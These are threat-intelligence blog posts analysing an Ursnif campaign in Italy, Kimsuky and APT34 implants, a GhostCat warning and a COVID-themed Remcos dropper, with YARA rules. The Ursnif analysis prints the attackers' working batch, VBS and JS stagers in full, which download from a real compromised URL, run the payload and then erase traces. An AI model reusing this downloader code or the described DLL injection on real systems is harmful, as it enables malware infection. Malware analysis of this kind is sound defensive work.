Ursnif Campaign Targets Italy with a New Infection Chain

Introduction

Ursnif is one of the most and widespread common threats today delivered through malspam campaigns. It appeared on the threat landscape about 13 years ago and gained its popularity since 2014 when its source code was leaked online giving the opportunity to several threat actors to develop their own version.

For months, Italian users have been targeted by Ursnif malicious campaigns and Cybaze-Yoroi Zlab have closely observed these campaigns in order to track the evolution of TTPs and the sophistication of the infection chains. In almost all the campaigns identified by the researchers it is possible to notice a massive usage of powershell as  dropper stagers,

This time, Cybaze-Yoroi ZLab intercepted a new Ursnif campaign targeting Italian users that relies on an Italian compromised website that acts as a DropUrl, it also shows a novelty usage of Javascript, batch files and SFX archives, refining the malware’s infection chain.

Figure 1: Ursnif Infection Chain

Technical Analysis

This brand new Ursnif campaign is delivered as a malicious mail containing a password protected document:

Hashe9697d963d66792a91991e64537707a94f466421615277d91675b83a408eef93
ThreatUrsnif document dropper
Brief DescriptionUrsnif Document Dropper Password Protected
Ssdeep12288:9ZPntL7GQw8jzl7v4MvvnaTiIY11jTW84LYMdX9:ftXGxQ7vBvvnjVbTWthdt

Table 1. Sample information

Once the Microsoft Word document is opened, it will ask for a password to enable the opening of the document:

Figure 2: Request of the password inside the document

This technique to protect the document with a password continues to be a very effective method to evade detection of AVs. In fact, at the time of writing, the AV score is zero.

Figure 3: VirusTotal detection rate

Once provided the correct password, the document proceeds with the sophisticated infection chain. Then the  malware enables the execution of an initial batch file:

Figure 4: Piece of the BAT file

The batch file is easy to read, also with the junk numbers placed inside the code. After cleaning the script looks like this:

set HyperX=C:\DiskDrive\1\Volume\BackFiles\pinumber.vbsecho Dim mySettings1, mySettings2, mySettings3, mySettings4, mySettings5, concept, Gear >> %HyperX%echo On Error Resume Next >> %HyperX%echo. >> %HyperX%echo Set mySettings1 = Wscript.Arguments >> %HyperX%echo Set mySettings2 = CreateObject("WinHttp.WinHttpRequest.5.1") >> %HyperX%echo mySettings5 = mySettings1(0) >> %HyperX%echo concept = mySettings1(1) >> %HyperX%echo. >> %HyperX%echo mySettings2.Open "GET", mySettings5, False >> %HyperX%echo mySettings2.Send >> %HyperX%echo Gear = mySettings2.Status >> %HyperX%echo. >> %HyperX%echo If Gear ^<^> 200 Then >> %HyperX%echo    WScript.Quit 1 >> %HyperX%echo End If >> %HyperX%echo. >> %HyperX%echo Set mySettings4 = CreateObject("ADODB.Stream") >> %HyperX%echo mySettings4.Open >> %HyperX%echo mySettings4.Type = 1 >> %HyperX%echo mySettings4.Write mySettings2.ResponseBody >> %HyperX%echo mySettings4.Position = 0 >> %HyperX%echo. >> %HyperX%echo Set mySettings3 = CreateObject("Scripting.FileSystemObject") >> %HyperX%echo If mySettings3.FileExists(concept) Then mySettings3.DeleteFile concept >> %HyperX%echo mySettings4.SaveToFile concept >> %HyperX%echo mySettings4.Close >> %HyperX%cscript //nologo C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs http://tealex.it/colorex/somatrex.php C:\DiskDrive\1\Volume\BackFiles\Hikerio.exebreak>C:\DiskDrive\1\Volume\BackFiles\pinumber.vbshell -C Sleep -s 4;Saps 'C:\DiskDrive\1\Volume\BackFiles\Hikerio.exe'

Code snippet 1

The script creates a new file named “pinumber.vbs” and starts filling it with the instructions through the “echo” function appending the strings to the next vbs stage. The instructions will be commented on in the next stage of the malware infection.

Then the Visual Basic script will be stored in that unusual path:

Dim mySettings1, mySettings2, mySettings3, mySettings4, mySettings5, concept, Gear On Error Resume Next  Set mySettings1 = Wscript.Arguments Set mySettings2 = CreateObject("WinHttp.WinHttpRequest.5.1") mySettings5 = mySettings1(0) concept = mySettings1(1)  mySettings2.Open "GET", mySettings5, False mySettings2.Send Gear = mySettings2.Status  If Gear <> 200 Then    WScript.Quit 1 End If  Set mySettings4 = CreateObject("ADODB.Stream") mySettings4.Open mySettings4.Type = 1 mySettings4.Write mySettings2.ResponseBody mySettings4.Position = 0  Set mySettings3 = CreateObject("Scripting.FileSystemObject") If mySettings3.FileExists(concept) Then mySettings3.DeleteFile concept mySettings4.SaveToFile concept mySettings4.Close 

Code Snippet 2

Another relevant element to notice in “Code Snippet 1”, is the presence of the DropURL provided as an argument to the “Code snippet 2” and used to download the next stages.

In order to use a VBS script to download the next stage, the malware loads two Objects, "WinHttp.WinHttpRequest.5.1" and "ADODB.Stream" which allow the script to download the required component from the DropURL. This time the DropURL is an Italian compromised law-themed website. The crooks have previously hacked the website and leveraged it to install a webshell on it and finally spread malware. An evidence about the presence of the malicious file hosted on the legit website is shown in the following figure:

Figure 5: Communication with the DropUrl

The SFX module

The downloaded file, as previously mentioned, is a Self Extracting Archive (SFX/SEA). Basic information about the sample are provided below: 

Hash15db7230bb8a6a1a9e8a7fa319220622e35a3bdaf75307280ef3b6c6b514d697
ThreatUrsnif SFX packer
Brief DescriptionUrsnif SFX Packer
Ssdeep24576:120gPgFKEGQNXSAHpZIAcq0vFwKTqSmtLeStyRM3Jk6:MKVNCAHp/b07grIRGk6

Table 2. Sample information about the ursnif SFX Packer

Exploring the SFX, it is possible to see its content. In the archive, five files with different extensions are stored. Once executed, the first file that  runs is “Dwsil23j.vbs”, as described in the archive configuration on the right of the following figure.  

Figure 6: Content of The SFX file

The content of the VBS script previously mentioned is very trivial: its only purpose is to run “setcong.bat”, a batch script even contained in the SFX archive.  

Set WshShell = CreateObject("WScript.Shell") WshShell.Run "setcong.bat", 0, false

Code Snippet 3

The content of “setcong.bat” batch file is the following: 

@Echo off
timeout 3
rename driver3213.sys plugin.rar"lsassc.exe" e -pControl plugin.rartimeout 5start sillent.vbstimeout 4del /f /q "setcong.bat"del /f /q "plugin.rar"del /f /q "C:\Users\mycomp\Desktop\inst.exe"@exit

Code Snippet 4

In the figure 6 is reported the content of the SFX archive, we can also notice the presence of the file “driver3213.sys which appears as a driver, but that hides a different content. The file is immediately renamed into “plugin.rar” and extracted through the “lsassc.exe” utility, which is actually a legit routine aimed at extracting other components. The “plugin.rar” is extracted using the password “Control” in this way:

Figure 7: Extraction and content of “plugin.rar” file

The “plugin.rar” archive content

At this point, the script shown in Code Snippet 4 launches the “silent.vbs” script contained inside the “plugin.rar” archive, the script is able to cover tracks deleting some files no longer useful.

The content of the “silent.vbs” archive is the following:

Set WshShell = CreateObject("WScript.Shell")WshShell.Run "C:\ASPNET\Terminaled\data.bat", 0, false

Code Snippet 5

Using the same technique shown in Code Snippet 3, “silent.vbs” script has the only purpose to launch the “data.bat” file just extracted from “plugin.rar” archive:

@echo offattrib +s +h "C:\ASPNET\Terminaled"
timeout 2set lkpzaffqx=C:\ASPNET\Terminaledset cdeefyxbe=javagh.jsjavagh.js /starttaskkill /f /im lsassc.exetaskkill /f /im lsassc.exeattrib -s -h "C:\ASPNET\Terminaled\javagh.js"timeout 4del "C:\ASPNET\Terminaled\Dwsil23j.vbs"del "C:\ASPNET\Terminaled\javagh.js"del "C:\ASPNET\Terminaled\lsassc.exe"del "C:\ASPNET\Terminaled\sillent.vbs"del "C:\ASPNET\Terminaled\plugin.rar"del "C:\ASPNET\Terminaled\data.bat"del /q "C:\ASPNET\Terminaled*.*"rd "C:\ASPNET\Terminaled"@exit

Code Snippet 6

The bat script executes the “javagh.js” stager after forcing the kill of the previous “.rar” archive and finally removes all the traces through the deletion of all files contained in the folder at “C:\ASPNET\Terminaled\” path. 

The content of the JS script is reported below:

WShell = new ActiveXObject('WScript.Shell');var cr = 2;var df = new ActiveXObject("Scripting.FileSystemObject");var tmp = df.GetSpecialFolder(cr) + '///';
function decodeBase64(a) {    var b = new ActiveXObject("Microsoft.XMLDOM");var c = b.createElement("tmp");    c.dataType = "bin.base64";c.text = a;return c.nodeTypedValue;}
function writeBytes(a, b) {     var c = 1;    var d = new ActiveXObject("ADODB.Stream");d.Type = c;    d.Open();    d.Write(b);    d.SaveToFile(a);}
function writeBase64FileInTemp(a, b) {    var c = 2;    var d = new ActiveXObject("Scripting.FileSystemObject");    var e = d.GetSpecialFolder(c) + "///" + b;    if (d.FileExists(e)) {return e;}    else {        writeBytes(e, decodeBase64(a));        return e;   }}
var picture = "BASE64-PAYLOAD1";var server = "BASE64-PAYLOAD2";
writeBase64FileInTemp(picture, "scvhoster.exe");WShell.run(tmp + "scvhoster.exe");

Code snippet 7

This is the last stage of the infection chain. The JS module has got two embedded payloads encoded in Base64 without any type of encryption and any type of obfuscation. The variable named “server” is not referenced by the other code inside the script. However, we decided to take a look inside the executable. The executable is written in .NET and, through a static analysis we discovered a fake Office Update, as shown in the following screen:

Figure 8: Screen of the server.exe file

As previously mentioned, the .exe is never called in the code, so we put our attention on the second payload contained in the variable named “picture”. Once executed, the program has been renamed in “scvhoster.exe” which is nothing but the Ursnif payload already described in other our report. It performs the classic injection technique through “rundll32.exe”, using “iexplore” as host process. After that, all the information about compromised machine are sent over the HTTP protocol using a GET method:

Figure 9: Example of communication with the C2

Unfortunately, at the time of the analysis, the C2 did not correctly respond and the payload does not send to the C2 the configuration about the infection on the victim machine. However, digging inside the memory process, we found the key “fiwDZ5p05nCx1JSA” used to encrypt the configuration string:

Figure 10: Key of the configuration string of Ursnif version

After the decryption phase, as masterfully explained by Fortinet Labs,the string containing all the parameters sent in clear mode looks like following:

type=0&soft=3&version=300854&user=024fd34c2d0f4520be46c31a267d42f4&group=202003111&id=8576b0d0&arc=0&crc=00000000&uptime=10243

Code Snippet 8

Conclusion

In one of our previous analyses, we published a comparative table that tracks the evolution of the TTPs used to spread and deliver the malware. We observed the constant presence of heavily obfuscated Powershell scripts, but this campaign appears different because operators abandoned it in favour of VBS and JS scripts. Our threat intelligence and threat hunting activities confirm this new trend, attackers use javascripts as a multistage loader.

The changes in the TTPs could be caused by:

Our constant threat monitoring intelligence aims at tracking the evolution of the modus operandi of these Cyber Threats and at providing the best protection to our clients. 

Figure 11: Update of the comparative table of the Ursnif TTPs

Indicators of Compromise

Yara Rules

rule loaderDOC_Ursnif_March_2020 {
meta:
      description = "Yara rule for Ursnif DOC loader - March Campaign"
      hash = "e9697d963d66792a91991e64537707a94f466421615277d91675b83a408eef93"
      author = "Cybaze - Yoroi  ZLab"
      last_updated = "2020-03-16"
      tlp = "white"
      category = "informational"
    
strings:
	$s1 = "A4$D#"
	$s2 = "[w:|(ee"
	$s3 = "}8&+<n"
	$s4 = "8wk<\"J*f"
	$s5 = "mB/@a_"
	$s6 = {DF 30 AB AD 9B 45 69 F2}
	$s7 = {94 B0 D7 0F BF 97 C9 E0}
	$s8 = {DA 79 E7 E6 2F 94 0E 8C}
	$s9 = {18 A9 17 7A 10 3B 2E EA}
	$s10 = {63 21 04 02 A5 1E CD 95}
	  
condition:
	6 of ($s*)
}

import "pe"
rule payload_EXE_Ursnif_March_2020 {
meta:
      description = "Yara rule for Ursnif payload - March Campaign"
      hash = "a4bbf7654331415c4f7d0306066ececa014a27d706deca83bd7113ad4cd28d2e"
      author = "Cybaze - Yoroi  ZLab"
      last_updated = "2020-03-16"
      tlp = "white"
      category = "informational"
    
strings:
	$s1 = "t49B(t/"
	$s2 = "NtQueryVirtualMemory"
	$s3 = "=%#Si9"
	$s4 = "~e?bo3r8mod4^s"
	$s5 = "8wdyw8e9dtew89dtew"
	$s6 = {E6 D9 E8 D6 E9 8D 9E 8D}
	$s7 = {F1 83 99 61 B9 0F A3 0E}
	$s8 = {D3 E0 83 C7 04 03 D8 4E}
	$s9 = {12 8B 01 0F B6 10 40 89}
	$s10 = {D6 20 C3 9B 79 DA C3 7C}
	  
condition:
	uint16(0) == 0x5A4D and 4 of($s*) and pe.imphash() == "c7f457269137f2e5ebe199ab9f32eada"
}

This blog post post was authored by Davide Testa, Luigi Martire, Antonio Pirozzi and Pierluigi Paganini.

The North Korean Kimsuky APT keeps threatening South Korea evolving its TTPs

Introduction

Recently we have observed a significant increase in state-sponsored operations carried out by threat actors worldwide. APT34, Gamaredon, and Transparent Tribe are a few samples of the recently uncovered campaigns, the latter was spotted after four years of apparent inactivity. Cybaze-Yoroi ZLab decided to study in depth a recent threat attributed to a North Korean APT dubbed Kimsuky.

Figure 1: tweet on 28 February 2020

The Kimsuky APT group has been analyzed by several security teams. It was first spotted by Kaspersky researcher in 2013, recently its activity was detailed by ESTsecurity.

We decided to analysed the activity of the group after noticing a tweet of the user “@spider_girl22” in February 28th 2020.

Technical Analysis

Unlike other APT groups using long and complex infection chains, the Kimsuky group leverages a shorter attack chain, but at the same time, we believe it is very effective in achieving a low detection rate.

The infection starts with a classic executable file with “scr” extension, an extension used by Windows to identify Screensaver artifacts. In the following table are reported some information about the sample.

Hash757dfeacabf4c2f771147159d26117818354af14050e6ba42cc00f4a3d58e51f
ThreatKimsuky loader
Brief DescriptionScr file, initial loader
Ssdeep12288:APWcT1z2aKqkP/mANd2JiEWKZ52zfeCkIAYfLeXcj6uuLl:uhT1z4q030JigZUaULeXc3uLl

Table 1: Information about initial loader with .scr extension

Upon execution, the malware writes a file named “<random_name>.tmp.db” inside the “%AppData%\Local\Temp” path through the usage of the Microsoft Utility “regsvr32.exe”.

Figure 2: Written file (AutoUpdate.dll) in the “%AppData%\Local\Temp” path

Despite the “.db” extension, the written file is actually a well formed DLL that acts as the second stage of the malware infection. Static information of DLL are shown below:

Hashcaa24c46089c8953b2a5465457a6c202ecfa83abbce7a9d3299ade52ec8382c2
ThreatKimsuky second stage
Brief DescriptionDLL used by the Kimsuky group as second stage
Ssdeep6144:6lhe64TNUalJMRRfS5mABlakVxOfLnePfcNl6GwUDuL/:6zfeCkIAYfLeXcj6uuL

Table 2: AutoUpdate.dll Information

The dll is then copied into the folder “%AppData%\Roaming\Microsoft\Windows\Defender\” and it is renamed into “AutoUpdate.dll”. 

The “AutoUpdate.dll” library then gains persistence by setting the following registry key “HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\WindowsDefender”. The name and the path used by the attacker is absolutely tricky, because they reference to Windows Defender:

Figure 3: registry key set for persistence .

Furthermore, exploring the content of the folder “%AppData%\Local\Temp” path, we observed another temporary file created and immediately removed dubbed “<random_name>.tmp.bat”. By analyzing its contents, we noticed that it is used to delete the initial artifact (scr) and file itself.

Figure 4: Content of the bat script.

In order to hide the malicious operation and avoid raising suspicion, a legit document is created in the same folder containing the “.scr” file, the document is named “이력서 양식.hwp”. Translating its name from Korean to English language, is possible to obtain the “CV Form” string. The name and other information about the document are the following:

Hashd21523b7b8f6584305a0a6a83cd65c8ce0777a42ab781c35aa06c46c91f504b4
ThreatKimsuky legit document
Brief DescriptionLegit document used to divert attention on the malware in “hwp” extension
Ssdeep192:zXEKVs7kRvm+1FsO2ui/VpIkCnH5QVSV9VahhU:r3YkA+1aJukWQVS9avU

Table 3: Information about legit document with “.hwp” extension

As implied by the file name (CV Form), the document contains a CV form with empty fields, as shown in the following figure.

Figure 6: Legit document overview

Bypassing AV Detection

An interesting behaviour is the “explorer.exe” injection performed by the “AutoUpdate.dll” in order to avoid AVs detection. Digging in the malicious code, it is possible to see the methods used to perform this operation. First of all, the malware sets the right privileges, as reported in the following image.

Figure 7: Privilege set for the correct injection

Once obtained the necessary privileges, the malware is able to proceed with the injection. As described by the analysis published by elastic, the malware writes the path to its malicious DLL in the virtual address space of another process through the “VirtualAllocEx” function. In this case, the target process is “explorer.exe”, it ensures the remote process loads it by creating a remote thread inside it. 

To perform these operations, first of all the malware needs to know the Process ID of the target, this is performed through the navigation of all processes tree. This task can be executed using the Tool Help Library Windows API family using CreateToolhelp32Snapshot()Process32First(), and Process32Next() API. Then, the malware calls VirtualAllocEx() to allocate a space to write the path to the malicious DLL, then it calls WriteProcessMemory()  to write the DLL path inside the allocated memory. 

After that, the malware calls the CreateRemoteThread() API to link the thread newly created to the host process (explorer.exe). Parts of the described logic are shown in the below figure:

Figure 8: API used for injection

Two components are implanted in the “explorer.exe” process. In the following tables are presented some information about the two DLLs extracted.

Hashbbad65136d73cbd5262bc88571677b5434ceb54fc1103f2133757dae2ec4b47b
ThreatInjected DLL
Brief DescriptionFirst injected DLL
Ssdeep3072:AFSYAyju5JpkC7xfYZo9cPqvTV+ql4yFa+zB+K+H/kocFAQUG5R:AFJ0qC7xAZliT004+p10fkoefUG5

Table 4: Information about first DLLinjected  in explorer.exe process

Hash817ef0d9d3584977d1114b7e92012b653d339434a90967cbe8016899801f3751
ThreatInjected DLL
Brief DescriptionSecond injected DLL
Ssdeep3072:AFSYAyju5JpkC7xfYZo9cPqvTV+ql4yFa+zo+K+H/kocFAnRG5R:AFJ0qC7xAZliT004+p00fkoegRG5

Table 5: Information about second DLL injected in explorer.exe process 

Comparing the ssdeep of the two DLLs is possible to notice several overlaps between the two libraries, a circumstance that confirms a high “similarity” between them. Below are highlighted the different portions of the hash:

3072:AFSYAyju5JpkC7xfYZo9cPqvTV+ql4yFa+z +K+H/kocFAnRG5R:AFJ0qC7xAZliT004+p * 0fkoe * RG5

There are tiny differences between the DLLs as shown below performing a simple binary diffing analysis.

Due to these differences between the two DLLs, we decided to continue the analysis on one of them. Digging into the DLL, we notice that every time a function has to be performed by the malware, it relies on a recurrent decryption routine, which decodes the strings containing the actual instruction and executes it. An example of the decryption routine is reported in the following figure on top right:

Figure 10: Decryption flow graph

Figure 11: Parts of subroutines used to perform network communication

Every 15 minutes, the malware contacts the C2 (suzuki.]datastore.]pe.]hu) and sends back the information about the compromised machine, as reported in the previous figure. In particular, three HTTP requests are made using different URLs paths and different User-Agent fields for each request.  An example of the C2 registration is the following:

Figure 12: Network traffic performed by the malware 

Conclusion

During our Threat Intelligence activities, we discovered a new malware implant compatible with the previous campaigns of Kimsuky APT actor. According to the ESTsecurity firm, the initial dropper contains two malicious resources embedding the malicious DLLs, however, in our sample there aren’t.

Despite these little differences, we can affirm with good confidence that the Threat Actor is Kimsuky due to strong similarities with the TTPs.

Indicator of Compromise

Yara Rules

import "pe"
rule loader {
    meta:
      description = "Yara rule for the initial loader SRC"
      author = "Yoroi - ZLab"
      last_updated = "2020-03-02"
      tlp = "white"
      category = "informational"
    
strings:
      	$a1 = " goto Repeat1"
		$a2 = {84 58 43 F4 39 1B 96 32 E4 2D 63}
		$a3 = {89 04 4D 30 7A 05 10 41 EB E8 8B}
		$a4 = {80 A1 B2 F7 15 DE F0 7E 35 75}
		$a5 = {9C 0E 57 4C 77 B1 0E 06 08 5E}

	  
    condition:
      uint16(0) == 0x5A4D and pe.number_of_sections == 5 and 3 of ($a*) 
}

import "pe"
rule AutoUpdate_dll {
    meta:
      description = "Yara rule for the AutoUpdate_dll"
      author = "Yoroi - ZLab"
      last_updated = "2020-03-02"
      tlp = "white"
      category = "informational"
    
strings:
      	$a1 = {48 8B 3F 48 83 78 18 10 72}
		$a2 = {36 42 35 45 35 41 42 33 42 41 39}
		$a3 = { DD E7 FE DA C6 F7 F9 8D 7D F9 }
		$a4 = "1#SNAN"
		$a5 = "d$4D9L$t"
		$a6 = "DllRegisterServer"
		$a7 = "DllUnregisterServer"
	  
    condition:
      uint16(0) == 0x5A4D and pe.number_of_sections == 6 and (4 of ($a*)) 
}

import "pe"
rule injectedDLL {
    meta:
      description = "Yara rule for the injected DLL"
      author = "Yoroi - ZLab"
      last_updated = "2020-03-02"
      tlp = "white"
      category = "informational"
    
strings:
      	$a1 = {41 80 3E 5E 89 45 A4 75 08 49}
		$a2 = {60 03 50 02 30 58 68 01 00 70}
		$a3 = {98 F7 02 00 7B 44 00 00 91 44}
		$a4 = "/?m=b&p1="
		$a5 = "&p2=b"
		$a6 = "/?m=a&p1="
		$a7 = "AUAVAWH"
	  
    condition:
      uint16(0) == 0x5A4D and pe.number_of_sections == 6 and (4 of ($a*)) 
}

rule legit_DOC {
    meta:
      description = "Yara rule for the Legit DOC"
      author = "Yoroi - ZLab"
      last_updated = "2020-03-02"
      tlp = "white"
      category = "informational"
    
strings:
      	$a1 = "HWP Document File"
		$a2 = "UPcfZrc"
		$a3 = {D1 A9 30 1A 5D C1 16 41 15 DA DF 54}
		$a4 = {B4 D5 31 1B F9 66 7C 56 5A 15}
		$a5 = {30 30 F8 18 18 F8 00 00 E0 00 00 C8}
		$a6 = {DC 66 43 0C 53 00 65 00 63 00}
		$a7 = {05 00 48 00 77 00 70 00 53 00 75 00 6D 00 6D}
	  
    condition:
      all of them 
}

Karkoff 2020: a new APT34 espionage operation involves Lebanon Government

Introduction

In November 2018, researchers from Cisco Talos tracked and detailed a “DNSEspionage” campaign against targets in Lebanon and UAE. At the time of the report, the threat actor carried out a cyber espionage campaign by redirecting DNS traffic from domains owned by the Lebanon government to target entities in the country.

In April 2019, Cisco Talos discovered evidence of the link between APT34 (codename Helix Kitten or OilRig) and the “DNSEspionage” operation. Talos analysts discovered several overlaps in the infrastructure employed by attackers and identified common TTPs. They tracked this new implant “Karkoff”.

Experts from Cybaze/ Yoroi Zlab, as part of ordinary Threat Intelligence activities, spotted a new sample which they believe to be an update of the Karkoff implant. It could prove that  APT34 is still active and threat actors used it in a new campaign that appears to be active at the time of writing. The APT group made some changes in its technique, tactics, and procedures, but the target is the same, the Lebanon Government.

In this campaign, the APT group may have compromised a Microsoft Exchange Server belonging to a Lebanon government entity, in fact, we found some evidence in the communication logic.

This new implant has some similarities with the samples of Karkoff involved in past campaigns, including:

Moreover, the new Karkoff implant implements a new reconnaissance logic in order to drop the final payload only to specific targets, gathering system information, the domain name, hostname and running Operating System.

Update

A few hours before this report has been publicly disclosed, malware researchers at the Italian cyber security firm Telsy also published their analysis.

Both reports are related to the same sample, but let me suggest reading both analyses to have a clear vision of the threat actors and all the technical details related to the implant. The report published by Telsy is available here: LINK.

Technical Analysis

Hash926e29f9242feb3e11c532616f7c90c5d7acab115d38ebf748cabaaa6a2a3667
ThreatAPT34 Karkoff macro loader
Brief DescriptionMalicious Excel macro 
Ssdeep24576:zLNkxqHOPi1K5sLMKd2rVIehO/KBhjPyVuVX/+2PPbK:wl4E

Table 1. Sample information

The Malware is an Excel Document with a malicious macro embedded. The following image (Fig:1) shows the highlights of the extracted code. 

Fig.1. Malicious Macro: drop and execute monitor.exe

The macro extracts a custom base64 code from the body of the file and, after a decoding routine, it downloads an executable file  into the following path “C:\Users\public\.Monitor\monitor.exe”. Persistence is assured by scheduling a new task named SystemExchangeService. 

Fig.2.Persistence with SystemExchangeService

The extracted  payload is summed up as follows: :

Fig.3.Static details of monitor.exe

The payload were not obfuscated at all. This made a simple and quick analysis.

As shown in the above figure, the creation date is on 29 February, this is an indicator of the recent build of this implant. Moreover, a small file size (1.13MB) allows malicious content to be downloaded and executed quickly.

Fig.4. details of compromised mail exchange server parameters

As the first step, as shown in Fig 4, the sample tries to connect to its own command and control server, which happens to be an Exchange mail server belonging to the Lebanon government. Once it connects, the C2 answers back with the list of available commands as attachments in a replied e-mail. Fig 5 shows the GetList function from where we might appreciate the eMail body decoding process. From the body, a custom encoded string is decoded and later it is interpreted as a command.

Fig.5. detail of GetList function responsible for getting the list of available commands as mail attachments

Following our analysis, we noticed the malware tries to connect back and forth to its C2 to get authorization and to share detailed information about the infected system. It used “UserAgent” of the exchange client. Fig 6 shows details on what is hijacked from the victim’s side.

Fig.6. details of Information stolen on the victim’s machine

Another evidence is the domain registration of the second command control: it has been registered on January, 27, probably indicating the date of the beginning of the new attack.

Fig.7. details of domain registration godoycrus[.com

Conclusions

APT34 is still active, and this campaign against the Lebanon government demonstrates it. The new version of the Karkoff malware is the demonstration that the Iran-linked APT34 cyberespionage group continues to improve its arsenal. The sample involved in this campaign implements new reconnaissance capabilities, it implements a covert and effective C2 communication channel through the use of the Microsoft Exchange Protocol.

The Group likely exploited or brute-forced a Lebanon related mail account with another tool of its arsenal, the JASON tool. The Jason tool was leaked at the end of 2019, it could be used by attackers to carry out bruteforce attacks on exchange servers.

Indicators of Compromise

Yara Rules

rule Karkoff_Attack_2020_Excel_macro {
	meta:
  	description = "Yara Rule for new APT34 Karkoff campaign excel malicious macro"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2020-03-02"
  	tlp = "white"
  	category = "informational"

	strings:
	
	   $a1 = "EncodedData0"
	   $a2 = "NewTask9"
	   $a3 = "EAAMYEKwUAAEsEWQUAAMYEnQUAAMYEqAUAAJwSrgU"
	   $a4 = "TVqQAAMAAAAEAAAA"
    condition:
	all of them

}


rule Karkoff_Campaign_2020 {
	meta:
		description = "Yara Rule for new APT34 Karkoff campaign"
		author = "Cybaze Zlab_Yoroi"
		last_updated = "2020-03-02"
		tlp = "white"
		category = "informational"

	strings:
	
	   $a1 = "SystemExchangeService" ascii wide
	   $a2 = "getWindowsVersion" ascii wide
	   $a3 = "GetCommands" ascii wide
	   $s1 = {0A 7A 1E 02 7B 9C 12 00 04 2A}

    condition:
	uint16(0) == 0x5A4D and all of them

}

Intensificazione degli Attacchi “GhostCat”

Proto: N010320.

Con la presente Yoroi desidera aggiornarla relativamente alla vulnerabilità “GhostCat” recentemente scoperta all’interno dei servizi Apache Tomcat, Application Server diffuso anche in ambienti enterprise. La criticità è stata segnalata inizialmente segnalata con il bollettino N050220.  

Durante il weekend sono state registrate attività di attacco volte a sfruttare la vulnerabilità sui servizi  Tomcat AJP esposti su internet (porta di default 8009). I tentativi di ricognizione volti all’identificazione e allo sfruttamento delle vulnerabilità sono tutt’ora in corso ed in aumento

Figura. Potenziale esposizione servizi AJP (Fonte:ShodanHQ)

Il Manutentore ha confermato che la problematica affligge i connettori AJP presenti in tutte le versioni Apache Tomcat, ed ha rilasciato patch di sicurezza per le versioni 7, 8 e 9, ma non per la versione 6 in quanto fuori supporto. 

A questo proposito Yoroi consiglia di valutare l’eventuale esposizione Internet dei servizi AJP e di seguire le indicazioni di mitigazione segnalate nel bollettino Early Warning N050220.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro “cyber”. Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index.

New Cyber Attack Campaign Leverages the COVID-19 Infodemic

Introduction

Nowadays, it is common to say that the physical world and the cyber world are strictly connected. The proof is the leverage of the current physical threat, the CoronaVirus, as a social engineering trick to infect the cyber world. It is not new for cyber-crooks to exploit social phenomena to spread malware in order to maximize the impact and dissemination of a malicious campaign. This is the case of the Greta Thunberg phenomenon exploited in recent Emotet campaigns or the holiday themed campaign spread a few months ago.

Indeed, during  the last month, a new virus, dubbed “Corona Virus” codename COVID-19 has been arising, infecting thousands of people in China, and also all around the world. 

The statistics are worrying, and, of course, they represent an opportunity for cyber-crooks. This kind of threat is opportunistic by design, aimed to hit everyone without any specific target. In an opportunistic attack scenario the malware is spread across a huge number of victims taking advantages of an early disclosed vulnerability and the time frame for patching it or taking advantages of a widespread phenomena such as in this case.

Threat actors are using fear and panic caused by the spread of the virus to deliver their malicious artifacts and increase the number of infected victims, making it look like a “Coronavirus countermeasures” document.

Kaspersky and IBM X-Force have recently discovered an Emotet campaign delivered on Corona Virus trend. In this case, based on the analysis of the shared IoC, all the identified samples are not new and were reused with some small changes. then delivered in China regions spread via a malicious decoy document, emphasizing the opportunistic nature of these attacks.

During our Threat Intelligence activities we noticed a suspicions artifact named “CoronaVirusSafetyMeasures_pdf”, so, intrigued by its name and by its recent submission on Yomi Hunter (LINK), we decided to deep dive into it.

Technical Analysis

Probably, the infection vector was a phishing mail containing a specific attachment. However, detailed information about the vector used to spread the malware are unknown. Our analysis, therefore, begins with the executable recovered from the Yomi Sandbox.

Hashc9c0180eba2a712f1aba1303b90cbf12c1117451ce13b68715931abc437b10cd
ThreatObfuscated Remcos RAT Dropper
Ssdeep768:dBbjxSuO05cYJAsq4XqkDSUWvcDD5Ebcoq:dSuT5cYJAsq4XqkxWID6m

Table 1. Sample information

The sample showed an interesting behavior, it established a TLS protected connection to a file sharing platform named “share.]dmca.]gripe”, possibly to avoid reputation warnings raised by next-gen firewalls.

Figure 2: URL in the dropper configuration

Figure 3: Dashboard of the file hosting service used

The file downloaded from this censorship free file hosting is actually a chunk of 125KB random looking bytes, suggesting it would likely be some binary payload protected with strong encryption.

Figure 4: Piece of the encrypted file downloaded from “share.]dmca.]gripe”

In the meantime, the malware writes two artifacts in the “C:\Users\<username>\Subfolder” system directory. Inside it,  two files named “filename1.vbs” and “filename1.exe” appeared.

Figure 5: Installed files

The content of the VBScript is straightforward: it simply is the launching point to run executable file. 

Figure 6: Body of the VBS script

The reboot survival of the infection is granted through the setup of the registry key “HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce”. A classical trick we keep noticing in a very huge number of malware implant, led us to think it actually still able to serve its malicious purpose even after decades, even after all the research community is fully aware of it.

Figure 7: Evidence of the set of the registry key

Then, the malicious code stores sensitive information gathered from the monitoring of user keypress in a file named “logs.dat”, placed in the  “%AppData%\Local\Temp\onedriv” directory. Different from the default Remcos working directory.

Figure 8: Path and file containing the sensitive information about the victim 

Finally, all the loot is sent to the remote command and control hosted at 66.154.98.108, operated by “Total server solutions LLC”, an US hosting provider operating since 2012.

Figure 9: C2 connection

Intercepting the malware process communications we noticed the usage “|cmd|” delimiter, a typical pattern confirming the final payload is a customized built of Remcos, also revealing the identifier of the attack campaign configured by the crooks: “j8gb-GBATN3”.

Figure 10: Piece of network communication intercepted

A summary of the infection chain can be represented by the following schema.

Figure 11: Malware attack chain

Conclusion

The COVID-19 phenomenon is scaring entire populations all around the world, many times raising panic and irrational or dangerous individual behaviors of a lot of people often pushed by some kind mass media narratives designed to leverage their uncertainty and emotional reactions, rather than inform them.

Cyber criminals are greedily looking at this kind of narrative and are launching wide-spread, opportunistic cyber attacks to exploit the irrational behaviors of the individuals overwhelmed by the COVID-19 infodemic. 

The ZLab-Yoroi Cybaze researchers advise to maintain a high attention level when receiving or treating communications claiming to be related to the CoronaVirus phenomenon, to avoid panic clicking on the link coming from unattended source and to contact trusted experts in case of the doubts. 

Indicator of Compromise 

